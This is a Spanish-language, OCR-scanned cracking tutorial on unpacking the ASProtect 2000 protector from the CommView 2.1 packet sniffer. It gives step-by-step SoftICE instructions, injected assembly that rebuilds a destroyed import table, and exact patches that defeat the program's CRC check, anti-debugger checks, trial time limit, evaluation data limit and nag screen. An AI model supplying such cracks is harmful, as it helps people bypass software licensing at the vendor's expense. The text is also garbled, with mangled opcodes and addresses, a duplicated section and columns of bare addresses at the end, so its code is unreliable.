en ASProtect (el call no regresa apropiadamente) este CALL es usado para decifrar la dirección API encriptada, normalmente la 
desencripta en tiempo de ejecución. 


190036 stosd ; la dirección de la API es desencriptada, copiala a la Tabla de Importación 
190037 Jmp l8a5le ; regresa a la normalidad, no olvides que este es el salto de 

regreso al loop 

19003c mov eax,KERNEL32!GetProcAddress ¡¿ usa SoftICE para tener el getprocaddress de tu 
sistema. Este es el caso 4 

190041 stosd ; Copia a la Tabla de Importación 

190042 Jjmp l8a5le ; regreso a la normalidad 


Cuando hayas terminado de escribir esto, pon un bpmb al punto de inicio del programa (Lo Encontre en 0x4de384 ) entonces lanzalo, si 
lo typeaste correctamente, la Tabla de Importación ahora es normal y puedes volcarla usando IceDump: 


PAGEIN D 400000 12d000 c:Mtemplecv dump.exe 


Ahora usa ProcDump para reconstruir el PE. 


Muy Importante: Usa estas opciones de ProcDump al reconstruir el PE: 
Structure : todos activdos 

Import : No reconstuir importacion (import) 

Las demas opciones dejalas intactas. 


Ahora tienes que copia manualmente la sección .aspr desde cv.exe (original) a 
cv_dumped.exe, usando tu Hexeditor favorito. Como un ejemplo, encontre dentro del 
offset raw original : 5aa00 longitud 14800, y en el offset raw volcado: ff400 
longitud 14800, esta manipulación copiará la Tabla de Importación original. 


Modifica el Punto de Entrada a 0OO0Ode384 dentro de ProcDump, para que tu exe volcado comience en 4de384. 
Copia tu exe volcado al directorio de commview. 


Ahora si lo lanzas, saldrá directamente porque hay un chequeo CRC, tenemos que 
parchear este código dentro del cv_dumped.exe volcado: 


004DE3B9 ca sub_4524A0 

004DE3BE mov eax, [ebp+var_10] 

004DE3C1 Call sub_465118 

004DE3C6 cmp eax, 6F200h 

004DE3CB 32 short loc_4DE3D2 <-— parchear a Jmp 4de3d2 
004DE3CD Call sub_403BB4 


No olvides una cosa, aún hay un anti-SoftICE. Reaciva el bpx createfilea y haz "d esp->4"; presiona F12 cuando atines, invierte el jz 
que está despues. 


Lanzalo de nuevo, ahora está trabajando y estás listo para continuar revirtiendo este liciado exe de tiempo de prueba. 


4) Qué queda para Crackear? 


Ahora el trabajo real está terminado, podemos parchear lo que sea que querramos. Te daré facilmente los parches, solo porque esta 
sección no fue la parte principal de mi ensayo, esto seguramente te salvara monton de trabajo. Para terminar su agonia, terminamos con: 


Rutina Anti SoftICE: Una tipica, Justo despues del bien conocido createfileA 


0046573E Call sub_406D0C (createfileA con driver se SoftICE como 
argumento) 

00465743 

00465743 crack5: 

00465743 cmp eax, OFFFFFEFFFh está cargado? 

00465746 Jz short loc_465750 <-— parchear esto a Jump 

00465748 push eax 

00465749 Call sub_406CEC 

0046574E mov b1, 1 


El limite de tiempo: Usualmente lo encontrarás despues de un bpx a getlocaltime, y 
rastrea despues. 


004D8D5B Call sub_44EB74 ; Este call contiene una llamada a getlocaltime 
004D8D60 

004D8D60 loc_4D8D60: ; CODE XREF: sub_4D899C+386 

004D8D60 mov eax, ds:dword_4E051C 

004D8D65 cmp byte ptr [eax], O ¡Está terminado el Trial? 

004D8D68 


004D8D68 jnz short loc_4D8DB8 <- Fuerza esto a Jump 


004D8D6A mov eax, ds:dword_4E0378 


Mitad de los paquetes desplegados: fácil con IDA, encuentra la referencia a la cadena: 


0048B5A4 push offset loc_48BB1C 

0048B5A9 push dword ptr fs: l[eax] 

0048B5AC mov fs: [eax], esp 

0048B5AF cmp byte ptr [ebx+5Fh], 0 

0048B5B3 

0048B5B3 nop ; nopea esto para que nunca salte a 48b5c2, adivinas por qué? 
0048B5B4 nop 

0048B5B5 lea edx, [ebp-14h] 

0048B5B8 mov eax, [ebx+22h] 

0048B5BB Call sub_48A7C0 

0048B5C0 jmp short loc_48B5CF 

0048B5C2 ; 

0048B5C2 lea eax, [ebp-14h] 

0048B5C5 mov edx, offset aDataThisEvalua ; "DATA: THIS EVALUATION 
VERSION DISPLAYS O"... 

0048B5CA Call sub_403E08 


Tienes 2 lugares mas para hacer lo mismo, encuentralos y corrige el *bug*. 


-la mosta nag cuando dejas commview: lo encontre despues de un bpx a createwindowsexa, tienes que presionar F12 muchas veces para 
encontrar esta rutina: 


00459718 loc_459718: ; CODE XREF: sub_45969C+6C 3 
00459718 ¿ sub_45969C+70 3 

00459718 mov eax, [ebp+var_C] 

0045971B mov edx, [eax] 

0045971D nop <- Tienes que nopear este call para evitar la nag 
0045971E nop 

0045971F nop 

00459720 nop 

00459721 nop 

00459722 nop 

00459723 mov [ebp-8], eax 

00459726 xor eaX, eax 

00459728 pop edx 

00459729 pop ecx 

0045972A pop ecx 

0045972B mov fs: [eax], edx 

0045972E push offset loc_459743 

00459733 

00459733 loc_459733: ; CODE XREF: CODE:00459741 3 
00459733 mov eax, [ebp+var_C] 

00459736 Call sub_403024 

0045973B retn 


Ahora puedes disfrutar tu nuevo portsniffer, auto reconstruido, Justo como debería ser. 


Notas Finales | 


Necesito tu retroalimentación sobre este ensayo, así que por favor escribe tus comentarios 


despues de probarlo, en: 
http://www.insidetheweb.com/mbs.cgi/mb155985 


Puedes unirte a todos los forums de reversers de sandman, de donde tuve esta idea: 
http://www.insidetheweb.com/mbs.cgi/mb628842 


O en el msgboard de fravia, para intermedios y avanzados: 
http://www.insidetheweb.com/mbs.cgi/mb155985 


Gracias a Eternal Bliss, r!sc y SV por sus trabajos preliminares en este 
objetivo interesante. 


Tsehp 


O | 


No te molestaré explicando que deberías comprar este programa si intentas usarlos por mas tiempo del permitido. Ouerrias ROBAR 
este software? no necesitas crackear su esquema de protección del todo: lo encontrarás en la mayoria de Sites de Wares, completo y ya 
registrado, adios, y no regreses. 


Estas muy dentro de reverser's page de Ingenieria Inversa Escoge tu camina de salida: 
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Desempacado Manual de Asprotect versión 2000 


Construyendo una Tabla de Importación Falsa 
Escrito Por Tsehp 


| Introducción 


Asprotect es un objetivo muy conocido, es empacador fue estudiado un monton y muy usado como objeto de practica para newbies. Si no sabes nada acerca de empaquetado o empacado, mejora tu conocimiento con los ensayos pasados, entonces 
puedes regresar, trataré de explicarte los últimos trucos. Acostumbro encontrar este objetivo cuando busco el msgboard del newbie de Sandman. Gracias a un reverser (cracker o revertidor) llamado SV que explicó bien la proteccion en sus 
terminos, su trabajo me salvo un monton de tiempo. 


Importante : Este ensayo puede producir una aplicación funcional con tu versión actual de Windows. Pero la Tabla de Importación que es reconstruida unicamente trabajará en Win NT 4.0/2000, por qué? La versión de commview que crackié está 
diseñada para win nt4/2000 , en win98 está instalada otra versión con una Tabla de Importación diferente. Así que si quieres desempacarla en Windows 98, no puedes usar la Tabla_de_construcción de archivo que proveo, usa mi método de 
cualquier forma, el código generará una Tabla funcional para Win 9x. 


También usé este método para picturestoexe, esta aplicación no usa exportación ordinal y el objetivo crackeado trabaja completamente en mi windows 2000 y win98. 


Este ensayo es provisto para enseñarte una nueva técnica cuando desempacas un objetivo con una Tabla de Importación completamente destruida, así que lee cuidadosamente y practica todo paso a paso. 


| Herramientas requeridas 


Softice 4.05 
Icedump 
Procdump 
Ida 4.10 

An hex editor 
pe-editor 


Ensayo hecho en win 2000. 


| URL/FTP del Objetivo 


http://www.tamos.com/ 
Esto es Commview 2.1, otro portsniffer. 


Ensayo 


1) Las rutinas anti-softice 


Antes de lanzar esta aplicación, tienes que esconder tu debugger. Este programa usa 2 tipicos trucos anti softice: 


-Esta cargado el driver? : bpx createfileA haz "d esp-4" 


Commview trata de ver si tres versiones diferentes de SoftICE están cargadas. Le pegarás 3 veces: SIWDEBUG SICE NTICE 


Bueno, depende del sistema en el que estás, presiona Fl cada vez, el createfilea debe retornar OxXFFFFFFFE, si no, presiona F12 otra vez y fija tu eip a la dirección apuntada por el ¡nz abajo, pasarás todas las pruebas. 


-El truco boundschecker. SICE usa int3 para sus breakpoints, pero cuando valores especiales son fijados para registrar, especialmente todo ebp conteniendo 'BCHK' 0x4243484b, Entonces, si un int3 es encontrado, el manejador normal de 
interrupción retorna despues de este Int3 dentro del objetivo, así el código se ejecuta si el SICE está presente. Para evitar esto, presiona F10 varias veces despues de fijar tu eip, ve despacio a través del código hasta que veas el int3 en SICE. Cuando 
estés allí, cambia tu ebp a algo más que 0x4243484b, entonces el programa correra normalmente hasta que un ultimo chequeo detectado por bpx createfilea, así como arriba. 


Para el chequeo final, invierte el jz despues de createfileA, todas las pruebas estan venciadas ahora. 


Nota : Solia hacer esto manualmente, porque frogsice no está implementado aun para Win NT, la copia actual en nt llamada Ntall no es del todo funcional, por lo que no pude usar un dispositivo cargado para evitar estas manipulaciones. 


2) Localizando el Punto de Entrada. 


Si quieres volcar tu programa empacado, debes parar el objetivo aquí, asi todas las secciones serían cargadas. Tengo que admitir que usé directamente la técnica que Eternal Bliss encontró en el Forum de los Newbies. Acá está, intacto: 


Pasos: 
1) bpx en getprocaddress 
2) Una vez rompas, ve la sección .idata por "dd 4E3000". Esto es encontrado 


haciendo "map32 cv" 

bpm en el ler byte (justo rompe acá) y desactiva el breakpoint getprocaddress 

F5 y deja correr el programa 

Al romper, desactiva todos los breakpoints 

r12 4 veces y aterrizaras en un Xor EAX, EAX 

Comienza rastreando con F10 

Siempre que te encuentres con un CALL, chequea que unas instrucciones abaja está JMP 
Si lo es, rastrea sobre él. 

) Si es un ret, tienes que rastrear dentro de ese CALL con F8 

) Entonces camina sobre los 2 CALL subsecuentes 

) Verás que el OEP se movio a alguna parte de EAX 

) Entonces te encontraras con un POPAD 
) 
) 
) 


RPP 00 -J 07.01 2 Li 
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p 


Las cosas de JMP aparecen de nuevo como el principio del código desempaquetado. 
Rastrea en el proximo CALL (el 3ro0) y F8 hasta que te encuentres con un ret 
Continua con eso y aterrizaras en el OEP. 


Solo aplica esto y lo encontraras, 0x4de384 en mi sistema. Solo recuerda que encontraras casi todo el tiempo una instrucción POPAD justo antes del salto (jump) final. 


Tienes que volcar el exe, usando icedump y procdump para reconstruir el pe (esto no será explicado aquí, si no sabes como hacer esto, solo ve los ensayos pasados sobre empacado/desempacado). 


Muy Importante: Usa estas opciones del ProcDump cuando reconstruyas el pe : Structure : desactiva la optimización de la estructura pe Import : no reconstruyas la importación, deja otra opción intacta. Tienes que copiar manualmente la sección 
.aspr de cv.exe (original) a cv_dumped.exe, usando tu Editor Hex favorito. Como un ejemplo, encontre dentro del offset raw original: 5aa00 longitud 14800 descargado el offset raw : f£f400 longitud 14800, esta manipulación copiará la Tabla de 
importación original. 


Pero esta descarga no trabajará, trata de cargar tu exe descargado dentro de ida y notarás que la Tabla de Importación está dañada, algunas direcciónes virtuales en otras secciones tambien son apuntadas a lugares incorrectos. De hecho, tenemos 
una Tabla de Importación legal dentro de la sección .aspr pero casi todas sus importaciones no están usadas, excepto para loadlibrarya, getmodulehandleA y getprocaddress, el resto está aquí para engañarnos, crackers estupidos ;-) 


La protección principal de ASProtect está justo aquí: Algunas importaciones estan bien y apuntan directamente a las direcciones APT, algunas otras estan apuntando a la Tabla (localizada en memoria en OxX00OCDxxxx) normalmente contiene 
algunas direcciones de importación desencriptadas y esta tabla originalmente contiene algunas rutinas para desencriptar otras direcciones cuando commview las necesita, aun cuando este programa está empacado. 


Bien aca tenemos un gran problema: puedes arreglar manualmente la Tabla de Importación si conviertes todas las direcciones de la tabla al .idata en el lugar correcto. 

Así en tu Aplicación descargada y dentro del .idata tienes 

4e328c : ¡mp [cd4950] and cd4950 conteniendo 77db858e (una dirección de importación valida) 

Podrías convertir el salto en 4e328c para apuntar directamente a 77db858e. 

Gastarias un monton de tiempo (acerca de 520 direcciones) y no trabajará, porque dentro de la tabla cdxxxx , algunas direcciones apuntan a código como este: cd4950 push cd495a call 182f68 (por ejemplo) 


Qué está pasando? cuando commview hace call 4e328c (Tabla de Importación) la rutina localizada en cd4950 desencripta la Dirección de Importación correcta EN TIEMPO DE EJECUCIÓN! también puedes tratar de volcar la tabla cdxxxx, el 
código de desencriptación seguirá estando aquí y definitivamente no trabajará. Esta caracteristica es la mejora real hecha, desde la ultima versión de ASProtect. Actualmente ellos ofrecen la descarga de una versión que no aplica ese tipo de 
protección, extraño? ;-) "La siguiente cosa para hacer es obtener una Tabla de Importación virgen, ya que la que está dentro de nuestro archivo descargado está corrupta. Así es como trabajaremos: 1. Insertando algún código para construir nuestra 
Tabla de Importación 2. Volcando nuestra Tabla de Importación al Disco Duro 3. Arreglando la dirección de la Tabla de Importación con un programa autocodificado." gracias blackb ;-) ) la versión previa de ASProtect era mas facil de 
desempacar, era posible localizar el IAT y volver ponerlo, mi ensayo previo sobre ASProtect proveia algunos saltos de memoria directa dentro de la Tabla de Importación, no generados por un getprocaddress. Esto trabaja pero el objetivo solo se 
ejecutará en tu pc y si actualizas algunos dll's, las direcciones no son las mismas y tu objetivo se cerrará. 


3) Generando nuestra Tabla de Cadenas 


Continuas en la instrucción int3, solo haz un S O L FFFFFFFF AC 08 CO 74 EA y localizaras el loop culpable de construir la Tabla de Importación de ASProtect, hazle un bpmb en el inicio. Encontre en este lugar mientras logeaba el loop usual 
getmodulehandle/getprocaddress, que cuando eres atrevido, aterrizas despues del CALL en 19a53a. 


Aquí está lo que encuentras : 


001B:0018A51E AC LODSB 

001B:0018A51F 08C0 OR AL,AL 

001B:0018A521  74E4 JZ 0018A507 

001B:0018A523  4E DEC ES 

001B:0018A524 56 PUSH ES 

001B:0018A525 53 PUSH EBX 

001B:0018A526  80F802 CMP AL, 02 

001B:0018A529 7407 JZ 0018A532 

001B:0018A52B  0FB64E01 MOVZX ECX,BYTE PTR [ESI+01] 

001B:0018A52F 41 INC ECX 

001B:0018A530 EBO5 JMP 0018A537 

001B:0018A532 B904000000 MOV ECX, 00000004 

001B:0018A537 41 INC ECX 

001B:0018A538 01CE ADD ESI,ECX 

001B:0018A53A E8B5FDFFFF CALL 0018A2F4 <- redirecciona este punto, 
nota la dirección 0x18a2f4. 

001B:0018A53F AB STOSD 

001B:0018A540 EBDC JMP 0018A51E <- nota esta dirección también, 


es el salto de regreso al loop. 


Todo lo que tenemos que haces es encontrar una localidad de memoria libre llena con O para que podamos escribir un pequeño código para modificar esta rutina. La dirección 0x180000 será usada como un ejemplo. 


Qué estamos haciendo: para reconstruir la Tabla de Importación, generaré algo para hacerlo. Revertí ASProtect para esto y encontre que está construyendo una Falsa Tabla de Importación para el objetivo que interactua con nuestra aplicación. 


La Tabla Thunk de Importación se ve como esto, commview llama esto: 


402000 call [4ebc38]; 4ebc38=cdec08 ; cdecO8=jump kernel32!compareStringA una llamada indirecta a API. o cdec08:push dfef04 , call 18ffe4 ; esta es mas desviada, en tiempo de ejecución esta es llamada, la Tabla generada en CDxxxx llama 
una rutina de desencripción que alimente la Tabla Thunk de Importación con las direcciones correctas. No pudes encontrar el TAT original antes de que todo esto sea generado primero, porque no existe mas, asi que no puedes usar procdump o un 
reconstructor de IAT para hacer trabajar la aplicación, tienes que reconstruir todo esta vez. 


El IAT será reconstruido en 2 pasos: 


1)generar un volcado, viendo esto: <Nombre_del_Modulo>0<Nombre_de_proc/numero_ordinal>0<dirección del objetivo correspondiente para copiar la dirección de la API> por ejemplo: 


GetcurrentThreadId0Kernel32.d11068bc4e00 etc.... acerca de 530 grupos generados, esto podria tomar un largo tiempo para hacerlo manualmente. ASProtect debe usar getmodulehandlea y getprocaddress para generar las direcciones correctas para 
su Tabla Daxxxx, asi que solo encontre las ocurrencias dentro de su código y rastree todos los parametros de función, para obtenerlos de vuelta dentro de mi call fixer. 


2)escribir un código en el final de esta descarga para regenerar el IAT thunk real (el luegar donde las direcciones de la API estan normalmente fijadas por el Sistema Operativo en tipo de carga) 


Primer paso 


NOTA : todas las direcciones son diferentes en cada ejecución de tu objetivo. 


Primer parche 18a53a ¡mp 180000 


Después escribe el siguiente código en memoria con SoftICE: 


Un Constructor de Tablas de Importación Falsas para commview hace un s 0 1 f£ffffff ac 08 cO 74 e4, esta busqueda es constante. Redirecciona la llmada justo antes del stosd a algún espacio libre de memoria (aquí en 180000) con un jump 180000, 
nota que la siguiente opción de direccion , (aquí 195004) nota la dirección llamada y repitela en el inicio de este código (aquí 19ff00) para la ultima parte de este código, el desencriptador, encuentra la dirección para llamar con: s 0 1 f£ffffff 55 Sb 
ec 81 c4 f8 fe ff ff 53 56, nota la dirección aquí (19ff08), no olvides parchear este desencriptador dentro de ASProtect haciendo un d 19ff08+95 y escribe tres nops 90 90 90, esto hará un ret normal despues de tu llamada. Pon 00 00 50 00 en la 
dirección 17fff0, justo en el inicio, esto comenzara una copia en 500000 (usando la memoria encargada de commview) no olvides llenar este lugar con 00's, con una longitud de 4000, solo para limpiar este lugar. 


Nota : este call fixer debe estar adaptado a tu objetivo, especialmente para los 3 casos diferentes (nombre_de_proc legal, ordinal y encriptado), las pruebas podrían 
ser diferentes, depnediendo de la versión de ASProtect y de la forma en que está implementada dentro del objetivo. 


data 
17fff0:00 00 50 00 ¿comenzamos a generar nuestro volcado en 500000 en memoria 


comenzando por ejemplo en 1b:00180000 


CALL 19£f£00 ¿ponemos de nuevo el CALL que redireccionamos aquí 

PUSHAD ¿Mejor los guardamos 

CMP DWORD PTR [0012FDF3],00 ;12fdf3 apunta al nombre_del_proc, de otra manera 
es un ordinal o uno encriptado (*2) 

JZ 00180065 ¡Va al procedimiento ordinal/encriptado 

PUSH 0012FDF3 ¿copiar desde (*1) 

1b6:180014 PUSH DWORD PTR [0017FFF0] ¿Copia a 

CALL 78281E39 ¿llamar a 1strcpy (tu dirección podría diferir) 

PUSH DWORD PTR [0017FFF0] ¿Solo para ver 

CALL 78291334 ¡de cuanto es esta Cadena 

INC EAX 

INC EBX 

ADD [0017FFFO0],EAX ¡fijar el puntero de memoria al siguiente lugar, 
para la cadena nombre_del_proc 

PUSH EBX ¡ebx apunta a la cadena nombre_del_modulo (resulta 
de call 19ff£00) (*3) 

PUSH DWORD PTR [0017FFFO] 

CALL 78281E39 ¿copiar otra vez 

PUSH DWORD PTR [0017FFFO] 

CALL 78291334 ¿chequear la longitud 

INC EAX 

ADD [0017FFF0],EAX ¡ajustar el offset de la Tabla 

MOV ECX, [0017FFF0] ¿ecx contiene un puntero a nuestra siguiente 
localidad de nuestra tabla para fijat la dirección 
del IAT 

MOV [ECX],EDI ¿edi siempre contiene la dirección del objetivo 
donde tenemos que poner la dirección de la API 

ADD DWORD PTR [0017FFF0],05 ¡fijar el offset al siguiente grupo 


POPAD ¿obtner los registros de vuelta 


JMP 00195004 ¿y continuar el loop de ASProtect 


1b:180065 CMP ECX, 00 ¿si ecx<>0 el nombre_del_proc es un +* ordinal 
JNZ 00180079 ¡así nosotros vamos al procedimiento ordinal 
PUSH DWORD PTR [EAX+01] ¡para pasar el parametro correcto al procedimiento 


de desencripción de Asprotect, normalmente 
llamado rutina 


CALL 0019FF08 ¡desencriptar el nombre_del_proc (*4) 
PUSH 0012FDEC ¡fijar la cadena nombre_del_proc que está 
desencriptada 
JMP 00180014 ¡tenemos la cadena nombre_del_proc  desencriptada, continuemos dentro de mi fixer 
1b:180069 SUB ESI,4 ¡ESI apunta aquí al numero ordinal de exportación 
(*5) 
PUSH ES ¡fijar el puntero al ordinal, y lo copiamos dentro 
de la tabla 
JMP 180014 ¡tenemos el ordinal, copiemoslo dentro de la tabla 


(*1) y (+3) esta dirección 12fdf3 fue encontrada mientras moraba dentro del CALL 19ff00, es empujado con el 1 en (*3) justo antes de una llamada a las secuencias getmodulehandleA y getprocaddress. 
(+2) Revisé este valor varias veces despues del CALL 19ff00, es una constante. 
(+4) Esta dirección la encontré mientras miraba dnetro de los saltos originales en el IAT, algunos saltos llaman directamente a las APIS, las encriptadas siempre comienzan por empujar xxxxxx, llamando esta dirección. 


(*5) El mismo método que (*1) Escribí la localidad de memoria y lo hice muy atrevido, ESI siempre es +4 despues de esta dirección en este caso. Pon un bmpb en el POPAD despues del CALL que redireccionaste, se activará cuando la copia este 
terminada. Finalmente vuelca tu talba para usarla despues. 


PAGEIN D 500000 3ba0 (por ejemplo) solo mira dentro de la memoria desde 500000 abajo hasta que encuentres el final de la Tabla, aquí tenemos los 3 componentes necesarios para reconstruir la Tabla de Importación de commview, el 
nombre_del_proc o numero ordinal, el nombre de su dll y la dirección del objetivo para copiar la dirección importada. 


Shortcut para probar tu commview volcado: 


Si eres perezoso, tienes aquí el resultado final: la Tabla volcada con el reconstructor añadido en el final. Solo toma tu commview volcado, tienes que realinearlo para que los offset del RVA = a los offsets raw, agregar una nueva sección (longitud = 
3c0e) en el final del objetivo, pegar este archivo en la nueva sección y cambiar el punto de entrada del commview en 530b45 (130b45 en procdump, la imagenbase es en 400000) y ver que está pasando con softice, todo está explicado en las 
siguientes lineas. 


4)Fijando el Reconstructor 


Ahora que tienes tu Tabla volcada y tu commview volcado, necesitamos agregar esta Tabla en el final de tu objetivo volcado, para facilitar tu trabajo el commview volcado debe tener los offsets RVA correspodiendo con los offsets raw, usa pe- 
editor para agregar una nueva sección con 4000 de longitud, aquí están los resultados: 


para las secciones: 


Tu tabla volcada consiste de casi 500 grupos de tres numero : nombre de modulo, nombre de procedimiento u ordinal y direcciones para copiar el resultado. 


Tengo que códificar un reconstructo en el final de la tabla volcada: 


Globalmente toma los primeros 2 números: nombre del módulo y nombre del proc/ ordinal, usa getmodulenameA y getprocaddress para obtener la dirección de la función en memoria y copia esta direccion en commview, aquí está el listado 
completamente explicado. 


00530AE7 db 4Fhj; O AQUÍ ESTÁ EL ÚLTIMO MIEMBRO DE TU TABLA VOLCADA, 
ves openSCManagerA, 

00530AE8 db 70h; p advapi32.dll y 004e3994 es la última dirección 
para copiar dentro de commview, 

00530AE9 do 65h ; e 4e3994 corresponde al último thunk del IAT original 


de commview. 
00530AEA db 6Eh ; n 


00530AEB 
00530AEC 
00530AED 
00530AEE 
00530AEF 


00530A 
00530A 
00530A 
00530A 
00530A 
00530A 
00530A 
00530A 
00530A 
00530A 
00530A 
00530A 
00530A 
00530A 
00530A 
00530A 


FO 
F1 
F2 
F3 
F4 
F5 
F6 
F7 
F8 
F9 
FA 
FB 
FC 
FD 
FE 


FF 


00530B00 
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DATA XREF: comienzo+85 o 


DATA XREF: comienzo+AC w 
comienzo+B9 r 


DATA XREF: comienzo+18 w 
comienzo+32 r 


00530B2E db Da 


00530B2F db Os 

00530B30 db Ou 

00530B31 alstrlen db 'lstrlen',0 ; DATA XREF: comienzo+C o ¿Escribir lstrlen 
para recuperar está dirección de procedimiento en tu reconstructor. 

00530B39 align 4 

00530B3C lpProcName dd 0 ; DATA XREF: comienzo+2C w 
00530B3C ¿ comienzo+51l r 

00530B40 current dd 0 ; DATA XREF: comienzo+22 w 
00530B40 ¿ comienzo+27 r 

00530B44 db 0-3 

00530B45 

00530BID E SODA e ara 
00530B45 


00530B45 ; este programa usa una tabla pegada arriba: 

00530B45 ; <nombredelproc>0<nombredelmódulo/ordinal de exportación >0O<dirección para copiar 
en la Tabla Thunk de Importación> 

00530B45 ; obtiene las direcciones reales para poner en la Tabla Thunk 

de Importación de la Aplicación 


00530B45 

00530B45 public start 

00530B45 start proc near 

00530B45 mov eax, offset aKernel32_dl1l ; obtiene un offset a 

kernel.dl1, en el inicio de la tabla 

00530B4A push eax ; 1lpModuleName 

00530B4B Call ds: GetModuleHandleA 

00530B51 push offset aLstrlen ; obtiene offset a la cadena lstrlen 

00530B56 push eax ; hModule 

00530B57 Call ds:GetProcAddress 

00530B5D mov ds:adr_lstrlen, eax 

00530B62 mov eax, offset aGetcurrentthre ; posiciona el offset en 

el comienzo de la tabla 

00530B67 mov ds:current, eax ; es un nombredeproc, lo guardamos 
temporalmente 

00530B6C 

00530B6C loc_530B6C: ; CODE XREF: comienzo+8F 3j 

00530B6C mov eax, ds:current 

00530B71 mov ds:lpProcName, eax ; guardar este offset de nombredeproc 

en el lugar correcto 

00530B76 push eax 

00530B77 Call ds:adr_1strlen ¡ calcular la longitud de la 

cadena nombredeproc 

00530B7D cmp eax, 1 ; es un ordinal de importación? 

00530B80 jz short loc_530BDB ; ir al tratamiento del ordinal 

00530B82 inc eax 

00530B83 add ds:current, eax ; ajustar el offset actual a la siguiente 

cadena 

00530B89 mov ebx, ds:current ; ahora es un nombredemódulo, 

obtenemos la dirección 

00530B8F push ebx ; l1pModuleName 

00530B90 call ds:GetModuleHandleA ¿ calculatar el manipular 

de nombredemódulo para getprocaddress 

00530B96 push ds: 1lpProcName ; Obtener el nombredeproc previo para 

calcular la dirección real 

00530B9C push eax ; hModule 

00530B9D Call ds:GetProcAddress 

00530BA3 nop 

00530BA4 

00530BA4 loc_530BA4: ; CODE XREF: comienzo+C7 3 

00530BA4 mov ebx, eax ; guardar el nombredeproc para la 


tabla de importación en ebx 
00530BA6 push ds:current 


00530BAC Call ds:adr_1strlen ¡ calculatar la longitud del 


nombredemódulo 

00530BB2 inc eax 

00530BB3 add ds:current, eax ¡; actualizar el offset actual, ahora 
apunta a la dirección de la Tabla Thunk de Importación de la aplicación 

00530BB9 mov ecx, ds:current 

00530BBF mov eax, [ecx] ; obtener la dirección de la aplicación 
00530BC1 mov [eax], ebx ; guardar la dirección del nombredeproc en la Tabla Thunk de Importación 
00530BC3 add ds:current, 5 ; actualizar el offset actual para 
que apunte al siguiente nombredemódulo 

00530BCA cmp ds:current, offset unk_530B07 ; Estamos en el final 
de la tabla? 

00530BD4 31 short loc_530B6C ; repetir a la siguiente dirección 
de la Tabla de Importación 

00530BD6 jmp loc_4DE384 ; Saltar al PE de la aplicación 
A E 
00530BDB 

00530BDB loc_530BDB: ; CODE XREF: comienzo+3B 3J 

00530BDB xor edx, edx 

00530BDD mov ecx, ds:lpProcName ; obtener el offset del ordinal 

de importación 

00530BE3 mov dl, [ecx] ; Obtener el número ordinal 

00530BE5 inc eax 

00530BE6 add ds:current, eax ¡; actualizar el offset actual para que 
apunte al nombredemódulo 

00530BEC mov eax, ds:current 

00530BF1 mov ds:dword_530B20, edx ; guardar el ordinal 

00530BF7 push eax ; 1pModuleName 

00530BF8 call ds:GetModuleHandleA ; obtener el manipulador del 
nombredemódulo 

00530BFE mov edx, ds:dword_530B20 ; recuperar el ordinal exportado 
del nombredeproc 

00530004 push edx ; l1lpProcName 

00530C05 push eax ; hModule 

00530C06 Call ds:GetProcAddress ; obtener la dirección del ordinal 
exportado, 

kernel32 

comparestringa es 25 por ejemplo 

00530C0C jmp short loc_530BA4 ; guardar la dirección de nombredeproc 
para la Tabla de Importación en ebx 

00530C0C start endp 

00530Cc0C 

00530C0C 


Cuando termines, arma SoftICE con un bpx getversion, lanza commview (desde su directorio original) en el 3er golpe, haz un bpx en 530b45 para que puedas chequear si trabaja el reconstructor. Si todo va bien, el reconstructor debe generar 
direcciones de API validas hasta la ultima dirección de commview en 4e3994. 


Trabaja, felicitaciones, has construido una Falsa Tabla de Importación dentro de tu commview. volcado 


Cuando el reconstructor termina su trabajo, salta al Punto de Entrada de commview 4de384. 


Saldrá directamente, porque hay un chequeo CRC, tenemos que parchear este codigo dentro del commview volcado; 


004DE3B9 Call sub_4524A0 

004DE3BE mov eax, [ebp+var_10] 

004DE3C1 Call sub_465118 

004DE3C6 cmp eax, 6F200h 

004DE3CB jz short loc_4DE3D2 <- parchear a jmp 4de3d2 
004DE3CD Call sub_403BB4 


No olvides una cosa, aún hay un truco anti SoftICE. Reactiva el bpx createfilea, haz "d esp->4"; presiona F12 cuando llega, entonces invierte el jz que sigue. 


Lanzalo de nuevo, ahora está trabajando y estas listo para continuar revirtiendo este invalido exe con tiempo de prueba. 


5) Qué queda para crackear? 


Ahora termina el trabajo real, podemos parchear lo que se querramos. Te daré los parches facilmente, solo porque esta sección no fue la parte principal de mi ensayo, esto seguramente te salvara de algun trabajo. Para terminar su agonia, 
terminamos con: 


Rutina Anti SoftICE : una tipica, justo despues del bien conocido createfileA 


0046573E Call sub_406D0C (createfileA con driver de SICE como argumento) 
00465743 

00465743 crack5: 

00465743 cmp eax, OFFFFFFFFh es cargado? 

00465746 jz short loc_465750 <- parchear esto a jump 

00465748 push eax 

00465749 Call sub_406CEC 

0046574E mov bl, 1 


-El limite de Tiempo: usualmente lo encuentras despues de un bpx a getlocaltime, y 
rastreando despues. 


004D8D5B Call sub_44EB74 ; este call contiene una llamada a getlocaltime 
004D8D60 

004D8D60 loc_4D8D60: ; CODE XREF: sub_4D899C+386 3 

004D8D60 mov eax, ds:dword_4E051C 

004D8D65 cmp byte ptr [eax], 0 ¡Está terminado el tiempo del trial? 
004D8D68 

004D8D68 jnz short loc_4D8DB8 <- fuerza esto a jump 

004D8D6A mov eax, ds:dword_4E0378 


otro lugar: 


004D8D60 loc_4D8D60: ; CODE XREF: sub_4D899C+386 3 
004D8D60 mov eax, ds:dword_4E051C 

004D8D65 cmp byte ptr [eax]l, 0 

004D8D68 

004D8D68 crack4: ; Tiempo limite, fuerzalo a jump 
004D8D68 jmp short loc_4D8DB8 


y también: 
00489688 crack6: ; arreglo para el tiempo de prueba, 
parchealo a jump 


00489688 jmp short loc_48968E 

ODA ESA ARSS A A O A AAA AA AR A 

0048968A mov byte ptr [ebp-1], 1 

0048968E 

0048968E loc_48968E: ; CODE XREF: sub_4894A0+72 3 

0048968E ; sub_4894A0+7C 3 

0048968E cmp [ebp+var_1], 1 

00489692 jnz short crack? ; Arreglo al tiempo de prueba 

00489694 mov ds:byte_4E1C19, 1 

0048969B 

0048969B crack?7: ; CODE XREF: sub_4894A0+1F2 3 

0048969B mov eax, 120020h ; arreglo al tiempo de prueba, fuerza 
este valor y nopea 

004896A0 nop 

004896A1 mov ds:byte_4E1C1A, 1 


otros parches, de otra forma, sale aleatoriamente 


004DA57C 
004DA581 
004DA584 
004DA584 
004DA584 
004DA586 
004DA586 
004DA58B 


004D8F3B 
004D8F3B 
004D8F40 
004D8F42 
004D8F42 
004D8F42 
004D8F44 
004D8F44 
004D8F49 


Call 


004DA8D9 
004DA8DB 
004DA8DB 
004DA8DB 
